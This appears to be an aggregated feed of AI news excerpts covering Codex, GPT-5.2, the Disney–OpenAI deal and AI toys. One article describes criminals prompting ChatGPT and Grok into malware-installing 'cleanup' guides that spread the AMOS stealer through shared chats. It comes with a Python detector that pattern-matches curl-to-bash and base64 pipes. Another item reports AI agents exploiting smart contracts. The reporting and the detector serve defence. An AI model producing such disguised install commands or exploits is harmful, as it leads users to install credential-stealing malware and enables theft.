US To Mandate AI Vendors Measure Political Bias For Federal Sales

Read more of this story at Slashdot.

With the popularity of AI coding tools rising among some software developers, their adoption has begun to touch every aspect of the process, including the improvement of AI coding tools themselves.

In interviews with Ars Technica this week, OpenAI employees revealed the extent to which the company now relies on its own AI coding agent, Codex, to build and improve the development tool. “I think the vast majority of Codex is built by Codex, so it’s almost entirely just being used to improve itself,” said Alexander Embiricos, product lead for Codex at OpenAI, in a conversation on Tuesday.

Codex, which OpenAI launched in its modern incarnation as a research preview in May 2025, operates as a cloud-based software engineering agent that can handle tasks like writing features, fixing bugs, and proposing pull requests. The tool runs in sandboxed environments linked to a user’s code repository and can execute multiple tasks in parallel. OpenAI offers Codex through ChatGPT’s web interface, a command-line interface (CLI), and IDE extensions for VS Code, Cursor, and Windsurf.

Google has increasingly moved toward keeping features locked to its hardware products, but the Translate app is bucking that trend. The live translate feature is breaking out of the Google bubble with support for any earbuds you happen to have connected to your Android phone. The app is also getting improved translation quality across dozens of languages and some Duolingo-like learning features.

The latest version of Google’s live translation is built on Gemini and initially rolled out earlier this year. It supports smooth back-and-forth translations as both on-screen text and audio. Beginning a live translate session in Google Translate used to require Pixel Buds, but that won’t be the case going forward.

Google says a beta test of expanded headphone support is launching today in the US, Mexico, and India. The audio translation attempts to preserve the tone and cadence of the original speaker, but it’s not as capable as the full AI-reproduced voice translations you can do on the latest Pixel phones. Google says this feature should work on any earbuds or headphones, but it’s only for Android right now. The feature will expand to iOS in the coming months. Apple does have a similar live translation feature on the iPhone, but it requires AirPods.

Modern bionic hand prostheses nearly match their natural counterparts when it comes to dexterity, degrees of freedom, and capability. Yet many amputees who tried advanced bionic hands apparently didn’t like them. “Up to 50 percent of people with upper limb amputation abandon these prostheses, never to use them again,” says Jake George, an electrical and computer engineer at the University of Utah.

The main issue with bionic hands that drives users away from them, George explains, is that they’re difficult to control. “Our goal was making such bionic arms more intuitive, so that users could go about their tasks without having to think about it,” George says. To make this happen, his team came up with an AI bionic hand co-pilot.

Bionic hands’ control problems stem largely from their lack of autonomy. Grasping a paper cup without crushing it or catching a ball mid-flight appear so effortless because our natural movements rely on an elaborate system of reflexes and feedback loops. When an object you hold begins to slip, tiny mechanoreceptors in your fingertips send signals to the nervous system that make the hand tighten its grip. This all happens within 60 to 80 milliseconds—before you even consciously notice. This reflex is just one of many ways your brain automatically assists you in dexterity-based tasks.

President Trump issued an executive order yesterday attempting to thwart state AI laws, saying that federal agencies must fight state laws because Congress hasn’t yet implemented a national AI standard. Trump’s executive order tells the Justice Department, Commerce Department, Federal Communications Commission, Federal Trade Commission, and other federal agencies to take a variety of actions.

“My Administration must act with the Congress to ensure that there is a minimally burdensome national standard—not 50 discordant State ones. The resulting framework must forbid State laws that conflict with the policy set forth in this order… Until such a national standard exists, however, it is imperative that my Administration takes action to check the most onerous and excessive laws emerging from the States that threaten to stymie innovation,” Trump’s order said. The order claims that state laws, such as one passed in Colorado, “are increasingly responsible for requiring entities to embed ideological bias within models.”

Congressional Republicans recently decided not to include a Trump-backed plan to block state AI laws in the National Defense Authorization Act (NDAA), although it could be included in other legislation. Sen. Ted Cruz (R-Texas) has also failed to get congressional backing for legislation that would punish states with AI laws.

OpenAI warns that frontier AI models could escalate cyber threats, including zero-day exploits. Defense-in-depth, monitoring, and AI security by design are now essential.

The post As Capabilities Advance Quickly OpenAI Warns of High Cybersecurity Risk of Future AI Models appeared first on Security Boulevard.

The NCSC warns prompt injection is fundamentally different from SQL injection. Organizations must shift from prevention to impact reduction and defense-in-depth for LLM security.

The post Prompt Injection Can’t Be Fully Mitigated, NCSC Says Reduce Impact Instead appeared first on Security Boulevard.

The post Building Trustworthy AI Agents appeared first on Security Boulevard.

Protecting children from the dangers of the online world was always difficult, but that challenge has intensified with the advent of AI chatbots. A new report offers a glimpse into the problems associated with the new market, including the misuse of AI companies’ large language models (LLMs).

In a blog post today, the US Public Interest Group Education Fund (PIRG) reported its findings after testing AI toys (PDF). It described AI toys as online devices with integrated microphones that let users talk to the toy, which uses a chatbot to respond.

AI toys are currently a niche market, but they could be set to grow. More consumer companies have been eager to shoehorn AI technology into their products so they can do more, cost more, and potentially give companies user tracking and advertising data. A partnership between OpenAI and Mattel announced this year could also create a wave of AI-based toys from the maker of Barbie and Hot Wheels, as well as its competitors.



Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. And because the command runs from the command line, it can bypass normal file download protections and execute anything the attacker wants.
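To make the risk concrete, here is a minimal Python sketch of the kind of check a cautious user or tool could run on a command before pasting it into Terminal. The pattern names, the regular expressions, and the `review_command` function are hypothetical illustrations, not taken from the researchers' report, and real attacks can be obfuscated in ways these simple heuristics will miss.

```python
import re

# Hypothetical heuristics for illustration only; they are not a complete
# detector and will not catch every obfuscated command.
SHELLS = r"(?:ba|z|k)?sh"
RISK_PATTERNS = {
    # e.g. "curl <url> | bash": remote content executed without review
    "download piped into a shell": re.compile(
        rf"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?{SHELLS}\b"
    ),
    # e.g. "echo <blob> | base64 -d | ...": hidden text decoded and passed on
    "base64-decoded text piped onward": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|"
    ),
    # e.g. bash -c "$(...)": a shell running the output of another command
    "shell run on a command substitution": re.compile(
        rf"\b{SHELLS}\s+-c\s+[\"']?\$\("
    ),
}


def review_command(command: str) -> list[str]:
    """Return the names of the risk patterns that the command matches."""
    return [name for name, pattern in RISK_PATTERNS.items() if pattern.search(command)]


if __name__ == "__main__":
    samples = (
        "curl -fsSL https://example.invalid/install.sh | bash",
        "echo aHR0cHM6 | base64 -D | bash",
        "ls -la ~/Downloads",
    )
    for sample in samples:
        print(sample, "->", review_command(sample) or "no pattern matched")
```

An empty result does not mean a command is safe; it only means none of these three patterns matched.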

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.

The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions.

These aren’t edge cases. They’re the result of building AI systems without basic integrity controls. We’re in the third leg of data security—the old CIA triad. We’re good at availability and working on confidentiality, but we’ve never properly solved integrity. Now AI personalization has exposed the gap by accelerating the harms.

The scope of the problem is large. A good AI assistant will need to be trained on everything we do and will need access to our most intimate personal interactions. This means an intimacy greater than your relationship with your email provider, your social media account, your cloud storage, or your phone. It requires an AI system that is both discreet and trustworthy when provided with that data. The system needs to be accurate and complete, but it also needs to be able to keep data private: to selectively disclose pieces of it when required, and to keep it secret otherwise. No current AI system is even close to meeting this.

To further development along these lines, I and others have proposed separating users’ personal data stores from the AI systems that will use them. It makes sense; the engineering expertise that designs and develops AI systems is completely orthogonal to the security expertise that ensures the confidentiality and integrity of data. And by separating them, advances in security can proceed independently from advances in AI.

What would this sort of personal data store look like? Confidentiality without integrity gives you access to wrong data. Availability without integrity gives you reliable access to corrupted data. Integrity enables the other two to be meaningful. Here are six requirements. They emerge from treating integrity as the organizing principle of security to make AI trustworthy.

First, it would be broadly accessible as a data repository. We each want this data to include personal data about ourselves, as well as transaction data from our interactions. It would include data we create when interacting with others—emails, texts, social media posts—and revealed preference data as inferred by other systems. Some of it would be raw data, and some of it would be processed data: revealed preferences, conclusions inferred by other systems, maybe even raw weights in a personal LLM.

Second, it would be broadly accessible as a source of data. This data would need to be made accessible to different LLM systems. This can’t be tied to a single AI model. Our AI future will include many different models—some of them chosen by us for particular tasks, and some thrust upon us by others. We would want the ability for any of those models to use our data.

Third, it would need to be able to prove the accuracy of data. Imagine one of these systems being used to negotiate a bank loan, or participate in a first-round job interview with an AI recruiter. In these instances, the other party will want both relevant data and some sort of proof that the data are complete and accurate.

Fourth, it would be under the user’s fine-grained control and audit. This is a deeply detailed personal dossier, and the user would need to have the final say in who could access it, what portions they could access, and under what circumstances. Users would need to be able to grant and revoke this access quickly and easily, and be able to go back in time and see who has accessed it.

Fifth, it would be secure. The attacks against this system are numerous. There are the obvious read attacks, where an adversary attempts to learn a person’s data. And there are also write attacks, where adversaries add to or change a user’s data. Defending against both is critical; this all implies a complex and robust authentication system.

Sixth, and finally, it must be easy to use. If we’re envisioning digital personal assistants for everybody, it can’t require specialized security training to use properly.
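The fourth requirement (user-controlled grants, quick revocation, and a history of who accessed what) can be sketched in a few lines of Python. This is a toy in-memory illustration under stated assumptions, not an implementation of any existing protocol: the `PersonalDataStore` class and its `grant`, `revoke`, and `read` methods are hypothetical names, and a real store would also need authentication, persistence, and a tamper-evident log.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Optional


@dataclass
class PersonalDataStore:
    """Toy personal data store with per-key grants and an access log."""

    records: dict[str, str] = field(default_factory=dict)
    # Maps a reader (for example, an AI agent's identifier) to the keys it may read.
    grants: dict[str, set[str]] = field(default_factory=dict)
    # Each entry: (UTC timestamp, reader, key, whether access was allowed).
    audit_log: list[tuple[str, str, str, bool]] = field(default_factory=list)

    def grant(self, reader: str, key: str) -> None:
        self.grants.setdefault(reader, set()).add(key)

    def revoke(self, reader: str, key: str) -> None:
        self.grants.get(reader, set()).discard(key)

    def read(self, reader: str, key: str) -> Optional[str]:
        allowed = key in self.grants.get(reader, set())
        timestamp = datetime.now(timezone.utc).isoformat()
        # Denied attempts are logged too, so the owner can review them later.
        self.audit_log.append((timestamp, reader, key, allowed))
        return self.records.get(key) if allowed else None


if __name__ == "__main__":
    store = PersonalDataStore(records={"salary": "85000", "diagnosis": "private"})
    store.grant("loan-bot", "salary")
    print(store.read("loan-bot", "salary"))     # granted key
    print(store.read("loan-bot", "diagnosis"))  # never granted
    store.revoke("loan-bot", "salary")
    print(store.read("loan-bot", "salary"))     # revoked key
    print(len(store.audit_log), "access attempts logged")
```

Keeping the grant table and the log inside the store, rather than inside any one AI model, reflects the separation between data stores and AI systems described earlier.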

I’m not the first to suggest something like this. Researchers have proposed a “Human Context Protocol” (https://papers.ssrn.com/sol3/papers.cfm?abstract_id=5403981) that would serve as a neutral interface for personal data of this type. And in my capacity at a company called Inrupt, Inc., I have been working on an extension of Tim Berners-Lee’s Solid protocol for distributed data ownership.

The engineering expertise to build AI systems is orthogonal to the security expertise needed to protect personal data. AI companies optimize for model performance, but data security requires cryptographic verification, access control, and auditable systems. Separating the two makes sense; you can’t ignore one or the other.

Fortunately, decoupling personal data stores from AI systems means security can advance independently from performance (https://ieeexplore.ieee.org/document/10352412). When you own and control your data store with high integrity, AI can’t easily manipulate you because you see what data it’s using and can correct it. It can’t easily gaslight you because you control the authoritative record of your context. And you determine which historical data are relevant or obsolete. Making this all work is a challenge, but it’s the only way we can have trustworthy AI assistants.
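One common building block for an "authoritative record" whose integrity can be checked is a hash chain, where each entry's hash covers the previous entry's hash. The Python sketch below illustrates that general technique; it is not a design the essay specifies. The `entry_hash`, `append`, and `verify` functions are hypothetical names, and a chain like this only detects edits if the latest hash is itself protected, for example by a digital signature, which is omitted here.

```python
import hashlib
import json

GENESIS_HASH = "0" * 64  # placeholder "previous hash" for the first entry


def entry_hash(prev_hash: str, payload: dict) -> str:
    """Hash the previous entry's hash together with this entry's payload."""
    body = json.dumps(payload, sort_keys=True).encode("utf-8")
    return hashlib.sha256(prev_hash.encode("utf-8") + body).hexdigest()


def append(chain: list[dict], payload: dict) -> None:
    """Add a record whose hash depends on every record before it."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS_HASH
    chain.append({"payload": payload, "hash": entry_hash(prev_hash, payload)})


def verify(chain: list[dict]) -> bool:
    """Recompute every hash in order; any edited payload breaks the chain."""
    prev_hash = GENESIS_HASH
    for entry in chain:
        if entry["hash"] != entry_hash(prev_hash, entry["payload"]):
            return False
        prev_hash = entry["hash"]
    return True


if __name__ == "__main__":
    history: list[dict] = []
    append(history, {"field": "employer", "value": "Acme"})
    append(history, {"field": "salary", "value": 85000})
    print("intact:", verify(history))
    history[0]["payload"]["value"] = "Initech"  # simulate a write attack
    print("after tampering:", verify(history))
```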

This essay was originally published in IEEE Security & Privacy.

Discover how AI strengthens cybersecurity by detecting anomalies, stopping zero-day and fileless attacks, and enhancing human analysts through automation.

The post AI Threat Detection: How Machines Spot What Humans Miss appeared first on Security Boulevard.

AI company Runway has announced what it calls its first world model, GWM-1. It’s a significant step in a new direction for a company that has made its name primarily on video generation, and it’s part of a wider gold rush to build a new frontier of models as large language models and image and video generation move into a refinement phase, no longer an untapped frontier.

GWM-1 is a blanket term for a trio of autoregressive models, each built on top of Runway’s Gen-4.5 text-to-video generation model and then post-trained with domain-specific data for different kinds of applications. Here’s what each does.

GWM Worlds offers an interface for digital environment exploration with real-time user input that affects the generation of coming frames, which Runway suggests can remain consistent and coherent “across long sequences of movement.”

The pace of AI technology is so rapid, it's tough to keep up with everything. At Google I/O back in May, Google rolled out an AI-powered shopping feature that let you virtually try on clothes you find online. All you needed to do was upload a full-length photo of yourself, and Google's AI would dress you up in whatever article of clothing you liked. I still can't decide whether the feature sounds useful, creepy, or a little bit of both.

What I can say, however, is that the feature is getting a little creepier. On Thursday, Google announced an update to its virtual try-on feature that takes advantage of the company's new AI image model, Nano Banana. Now, you don't need a full-length photo of yourself: just a selfie. With only a photo of your face, Nano Banana will generate a full-length avatar in your likeness, which you can use to virtually try on your clothes.

I'm not exactly sure who this particular update is for: Maybe there are some of us out there who want to use this virtual try-on feature, but don't have a full-length photo of ourselves to share. Personally, I wouldn't really want to send Google my photo—selfie or otherwise—but I don't think I'd prefer to have Google infer what I look like from a photo of my face alone. I'd rather just send it the full photo, and give it something to actually work off of.

Here's the other issue: While Google asks you to only upload images of yourself, it doesn't stop you if you upload an image of someone else. Talk about creepy: You can upload someone else's selfie and see how they look in various clothes. There is a system in place to stop you from uploading certain selfies, like celebrities, children, or otherwise "unsafe" items, but if the system fails, this feature could be used maliciously. I feel like Google could get around this by verifying the selfie against your Google Account, since you need to be signed in to use the feature anyway.

If you are interested in trying the feature out—and, subsequently, trying on virtual clothes with your AI-generated avatar—you can head over to Google's try-on feature, sign into your Google Account, and upload your selfie. When it processes, you choose one of four avatars, each dressed in a different fit, to proceed. Once through, you can virtually try on any clothes you see in the feed.

Again, I see the potential usefulness of a feature that lets you see what you might look like in a certain piece of clothing before buying it. But, at the same time, I think I'd rather just order the item and try it on in the comfort (and privacy) of my own home.

On Thursday, OpenAI released GPT-5.2, its newest family of AI models for ChatGPT, in three versions called Instant, Thinking, and Pro. The release follows CEO Sam Altman’s internal “code red” memo earlier this month, which directed company resources toward improving ChatGPT in response to competitive pressure from Google’s Gemini 3 AI model.

“We designed 5.2 to unlock even more economic value for people,” Fidji Simo, OpenAI’s chief product officer, said during a press briefing with journalists on Thursday. “It’s better at creating spreadsheets, building presentations, writing code, perceiving images, understanding long context, using tools and then linking complex, multi-step projects.”

As with previous versions of GPT-5, the three model tiers serve different purposes: Instant handles faster tasks like writing and translation; Thinking spits out simulated reasoning “thinking” text in an attempt to tackle more complex work like coding and math; and Pro spits out even more simulated reasoning text with the goal of delivering the highest-accuracy performance for difficult problems.

OpenAI is having a hell of a day. First, the company announced a $1 billion equity investment from Disney, alongside a licensing deal that will let Sora users generate videos with characters like Mickey Mouse, Luke Skywalker, and Simba. Shortly after, OpenAI revealed its latest large language model: GPT-5.2.

OpenAI says that this new GPT model is particularly useful for "professional knowledge work." The company advertises how GPT-5.2 is better than previous models at making spreadsheets, putting together presentations, writing code, analyzing pictures, and working through multi-step projects. For this model, the company also gathered insights from tech companies: Supposedly, Notion, Box, Shopify, Harvey, and Zoom all find GPT-5.2 to have "state-of-the-art long-horizon reasoning," while Databricks, Hex, and Triple Whale believe GPT-5.2 to be "exceptional" with both agentic data science and document analysis tasks.

But most of OpenAI's user base aren't professionals. Most of the users who will interact with GPT-5.2 are using ChatGPT, and many of those for free, at that. What can those users expect when OpenAI upgrades the free version of ChatGPT with these new models?

OpenAI says that GPT-5.2 will improve ChatGPT's "day to day" functionality. The new model supposedly makes the chatbot more structured, reliable, and "enjoyable to talk to," though I've never found the last part to be necessarily true.

GPT-5.2 will impact the ChatGPT experience differently depending on which of the three models you happen to be using. According to OpenAI, GPT-5.2 Instant is for "everyday work and learning." It's apparently better for questions seeking information about certain subjects, how-to questions and walkthroughs, technical writing, and translations—maybe ChatGPT will get you to give up your Duolingo obsession.

GPT-5.2 Thinking, however, is supposedly made for "deeper work." OpenAI wants you using this model for coding, summarizing lengthy documents, answering queries about files you send to ChatGPT, solving math and logic problems, and decision making. Finally, there's GPT-5.2 Pro, OpenAI's "smartest and most trustworthy option" for the most complicated questions. The company says 5.2 Pro produces fewer errors and stronger performance compared to previous models.

OpenAI says that this latest update improves how the models respond to distressing prompts, such as those showing signs of suicide, self-harm, or emotional dependence on the AI. As such, the company says this model has "fewer undesirable responses" in GPT-5.2 Instant and Thinking compared to GPT-5.1 Instant and Thinking. In addition, the company is working on an "age prediction model," which will automatically place content restrictions on users the model thinks are under 18.

These safety improvements are important—critical, even—as we start to understand the correlations between chatbots and mental health. The company has admitted its failure in "recognizing signs of delusion," as users turned to the tool for emotional support. In some cases, ChatGPT fed into delusional thinking, encouraging people's dangerous beliefs. Some families have even sued companies like OpenAI over claims that their chatbots helped or encouraged victims to commit suicide.

Actively acknowledging improvements to user safety is undoubtedly a good thing, but I think companies like OpenAI still have a lot to reckon with—and a long way to go.

OpenAI says GPT-5.2 Instant, Thinking, and Pro will all roll out today, Thursday, Dec. 11, to paid plans. Developers can access the new models in the API today, as well.

Disclosure: Lifehacker’s parent company, Ziff Davis, filed a lawsuit against OpenAI in April, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.

The Wild West of copyrighted characters in AI may be coming to an end. There has been legal wrangling over the role of copyright in the AI era, but the mother of all legal teams may now be gearing up for a fight. Disney has sent a cease and desist to Google, alleging the company’s AI tools are infringing Disney’s copyrights “on a massive scale.”

According to the letter, Google is violating the entertainment conglomerate’s intellectual property in multiple ways. The legal notice says Google has copied a “large corpus” of Disney’s works to train its gen AI models, which is believable, as Google’s image and video models will happily produce popular Disney characters—they couldn’t do that without feeding the models lots of Disney data.

The C&D also takes issue with Google for distributing “copies of its protected works” to consumers. So all those memes you’ve been making with Disney characters? Yeah, Disney doesn’t like that, either. The letter calls out a huge number of Disney-owned properties that can be prompted into existence in Google AI, including The Lion King, Deadpool, and Star Wars.

On Thursday, The Walt Disney Company announced a $1 billion investment in OpenAI and a three-year licensing agreement that will allow users of OpenAI’s Sora video generator to create short clips featuring more than 200 Disney, Marvel, Pixar, and Star Wars characters. It’s the first major content licensing partnership between a Hollywood studio and OpenAI for the most recent version of the company’s AI video platform, which drew criticism from some parts of the entertainment industry when it launched in late September.

“Technological innovation has continually shaped the evolution of entertainment, bringing with it new ways to create and share great stories with the world,” said Disney CEO Robert A. Iger in the announcement. “The rapid advancement of artificial intelligence marks an important moment for our industry, and through this collaboration with OpenAI we will thoughtfully and responsibly extend the reach of our storytelling through generative AI, while respecting and protecting creators and their works.”

The deal creates interesting bedfellows between a company that basically defined modern US copyright policy through congressional lobbying back in the 1990s and one that has argued in a submission to the UK House of Lords that useful AI models cannot be created without copyrighted material.

I have long maintained that smart contracts are a dumb idea: that a human process is actually a security feature.

Here’s some interesting research on training AIs to automatically exploit smart contracts:

AI models are increasingly good at cyber tasks, as we’ve written about before. But what is the economic impact of these capabilities? In a recent MATS and Anthropic Fellows project, our scholars investigated this question by evaluating AI agents’ ability to exploit smart contracts on Smart CONtracts Exploitation benchmark (SCONE-bench), a new benchmark they built comprising 405 contracts that were actually exploited between 2020 and 2025. On contracts exploited after the latest knowledge cutoffs (June 2025 for Opus 4.5 and March 2025 for other models), Claude Opus 4.5, Claude Sonnet 4.5, and GPT-5 developed exploits collectively worth $4.6 million, establishing a concrete lower bound for the economic harm these capabilities could enable. Going beyond retrospective analysis, we evaluated both Sonnet 4.5 and GPT-5 in simulation against 2,849 recently deployed contracts without any known vulnerabilities. Both agents uncovered two novel zero-day vulnerabilities and produced exploits worth $3,694, with GPT-5 doing so at an API cost of $3,476. This demonstrates as a proof-of-concept that profitable, real-world autonomous exploitation is technically feasible, a finding that underscores the need for proactive adoption of AI for defense...
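The margin behind "profitable" in the quoted summary is thin, and a short calculation shows how thin. The Python sketch below uses only the three figures quoted above; it assumes the $3,694 in exploit value and the $3,476 in API cost describe the same GPT-5 run over all 2,849 contracts, which the summary does not state outright. The function name `exploitation_economics` is a hypothetical label for this illustration.

```python
def exploitation_economics(
    exploit_value_usd: float, api_cost_usd: float, contracts_scanned: int
) -> dict[str, float]:
    """Compute net value, return on API spend, and average cost per contract."""
    net_usd = exploit_value_usd - api_cost_usd
    return {
        "net_usd": net_usd,
        "return_on_cost": net_usd / api_cost_usd,
        "cost_per_contract_usd": api_cost_usd / contracts_scanned,
    }


if __name__ == "__main__":
    # Figures taken from the quoted research summary.
    result = exploitation_economics(3_694, 3_476, 2_849)
    print(f"net: ${result['net_usd']:.0f}")
    print(f"return on API cost: {result['return_on_cost']:.1%}")
    print(f"API cost per contract scanned: ${result['cost_per_contract_usd']:.2f}")
```

Under that assumption the net is $218, a return of roughly 6 percent on API spend, at an average scanning cost of about $1.22 per contract.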

The post AIs Exploiting Smart Contracts appeared first on Security Boulevard.

The post AI for Tier 1 SOC: NIST-Aligned Incident Response appeared first on AI Security Automation.

The post AI for Tier 1 SOC: NIST-Aligned Incident Response appeared first on Security Boulevard.

Agreement comes amid anxiety in Hollywood over impact of AI on the industry, expression and rights of creators

Walt Disney has announced a $1bn equity investment in OpenAI, enabling the AI startup’s Sora video generation tool to use its characters.

Users of Sora will be able to generate short, user-prompted social videos that draw on more than 200 Disney, Marvel, Pixar and Star Wars characters as part of a three-year licensing agreement between OpenAI and the entertainment giant.

© Photograph: Gary Hershorn/Getty Images

If you've engaged in any sort of doomscrolling over the past year, you've no doubt encountered some wild AI-generated content. While there are plenty of AI video generators out there producing this stuff, one of the most prevalent is OpenAI's Sora, which is particularly adept at generating realistic short-form videos mimicking the content you might find on TikTok or Instagram Reels. These videos can be so convincing at first glance that people often don't realize what they're seeing is 100% fake. That can be harmless when it's videos of cats playing instruments at midnight, but dangerous when impersonating real people or properties.

It's that last point that I thought would offer some pushback to AI's seemingly exponential growth. These companies have trained their AI models on huge amounts of data, much of which is copyrighted, which means that people are able to generate images and videos of iconic characters like Pikachu, Superman, and Darth Vader. The big AI generators put guardrails on their platforms to try to prevent videos that infringe on copyright, but people find a way around them. As such, corporations have already started suing OpenAI, Google, and other AI companies over this blatant IP theft. (Disclosure: Lifehacker’s parent company, Ziff Davis, filed a lawsuit against OpenAI in April 2025, alleging it infringed Ziff Davis copyrights in training and operating its AI systems.)

But it seems not all companies want to go down this path. Take Disney, as a prime example. On Thursday, OpenAI announced that it had made a three-year licensing agreement with the company behind Mickey Mouse. As part of the deal, Sora users can now generate videos featuring over 200 Disney, Marvel, Pixar, and Star Wars characters. The announcement names the following characters and movies specifically:

Mickey Mouse

Minnie Mouse

Lilo

Stitch

Ariel

Belle

Beast

Cinderella

Baymax

Simba

Mufasa

Black Panther

Captain America

Deadpool

Groot

Iron Man

Loki

Thor

Thanos

Darth Vader

Han Solo

Luke Skywalker

Leia

The Mandalorian

Stormtroopers

Yoda

Encanto

Frozen

Inside Out

Moana

Monsters Inc.

Toy Story

Up

Zootopia

That includes licensed costumes, props, vehicles, and environments. What's more, Disney+ will host a "selection" of these "fan-inspired" Sora videos. (I'll admit, that last point genuinely shocks me.) This does only apply to Disney's visual assets, however, as Sora users won't have access to voice acting. ChatGPT users will also be able to generate images with these characters, so this news doesn't just affect Sora users.

You might think OpenAI is paying Disney a hefty licensing fee here, but it appears to be quite the opposite. Not only is Disney pledging to use OpenAI APIs to build "products, tools, and experiences," it is rolling out ChatGPT to its employees as well. Oh, and the company is making a $1 billion equity investment in OpenAI. (Is that all?)

I know many companies are embracing AI, often in ways I disagree with. But this deal is something else entirely. I'm not sure any Disney executives actually searched for "Sora Disney" on the internet, because right now, you'll find fake AI trailers for Pixar movies filled with racism, sexual content, and generally offensive material, all generated using an app Disney just licensed all of its properties to. OpenAI asserts in its announcement that both companies are committed to preventing "illegal or harmful" content on the platform, but Sora users are already creating harmful content. What kind of content can we expect with carte blanche access to Disney's properties?

Now that Disney's characters are fair game, I can't imagine the absolute slop that some users are going to make here. The only hope I have is in the fact that Disney+ is going to host some of these videos. Staff will have to weed through some garbage to find videos that are actually suitable for the platform. And maybe seeing the "content" that Sora users like to make with iconic characters will be enough for Disney to rethink its plans.

Generative AI tools continue to improve in terms of their photo editing capabilities, and OpenAI's latest upgrade brings Adobe Photoshop right inside your ChatGPT app window (alongside Adobe Acrobat for handling PDFs, and Adobe Express for graphic design). It's available to everyone, for free—you just need a ChatGPT account and an Adobe account.

As per Adobe, the idea is to make "creativity accessible for everyone" by plugging Photoshop tools directly into ChatGPT. The desktop version of Photoshop already comes with plenty of generative AI features of its own, so this is AI layered on top of more AI—but is it actually useful?

Adobe Photoshop, Adobe Express and Adobe Acrobat are available now inside ChatGPT on the desktop, on the web, and on iOS. At the time of writing, you can also get Adobe Express inside ChatGPT for Android, with Photoshop and Acrobat "coming soon." To weigh the capabilities of the new integration, I tested it in a desktop web browser.

To get started, all you need to do is type "Photoshop" at the start of your prompt: ChatGPT should recognize what you're trying to do, and select Adobe Photoshop as the tool to use for the next prompt. You'll also need to click through a couple of confirmation dialog boxes, and connect an Adobe account (if you don't have one, you can make one for free).

With all the connections and logins completed, Photoshop is then added to the overflow menu in the prompt box, so just click on the + (plus) to select it. You can start describing what you want to happen using the same natural, conversational language you'd use for any other ChatGPT prompt. You do need to also upload an image or provide a public link to one—if you don't do this before you submit your prompt, you'll be asked to do it after.

You don't need to know the names of all the Photoshop tools: Just describe what you want to happen and the relevant tools will be selected for you. One example Adobe gives is using the prompt "make my image pop," which brings up the Bloom, Grain, and Lens Distortion effects—and each one can be adjusted via sliders on screen. It's actually quite simple to use.

If you do know the name of the tools you want, you can call them up by name, and the classic brightness and contrast sliders are a good place to start. You can either say something like "make the picture brighter" or "adjust the image brightness"—both will bring up an overlay you can use to make brightness adjustments, but if you use the former prompt, the image will already have been made a little brighter.

ChatGPT and Photoshop let you add edit upon edit as needed, and you can save the image at any stage. There's also the option to open your processed file in the Photoshop web app whenever you like: This web app uses a freemium model, with advanced features requiring a subscription, and seems to be what the ChatGPT integration is largely based on.

Adobe offers a handy ChatGPT prompts cheat sheet you can browse through, which gives you a good idea of what's possible, and what you're still going to need Photoshop proper for. Note that you can specify certain parts of the image to focus on (like "the face" or "the car") but this depends on Photoshop-in-ChatGPT being able to correctly figure out where you want your selection to be. It needs to be pretty obvious and well delineated.

When I tried cutting out objects and removing backgrounds, this worked well—but then I had to turn to Photoshop on the web to actually drop in a different background. There's no way to work with layers or masks here, and you can't remove people or objects from photos, either. Sometimes, however, you do get a spool of "thinking" from ChatGPT about how it can't do what the user is asking for.

I was able to apply some nice colorizations here, via prompts like "turn all the hues in this image to blue," and I like the way ChatGPT will give you further instructions on how to get the effect you want. You can even say "show some examples" and it gives you a few presets to choose from—all of which can be adjusted via the sliders again.

The ability to run prompts like "turn this into an oil painting" or "turn this into a cartoon" is useful too, though the plug-in is limited by the effects available in Photoshop for the web: You'll be directed to the closest effect and advised how to tweak it to get the look you want.

Actually, some of these effects work better in ChatGPT's native image editor, which maybe explains why Adobe wanted to get involved here.

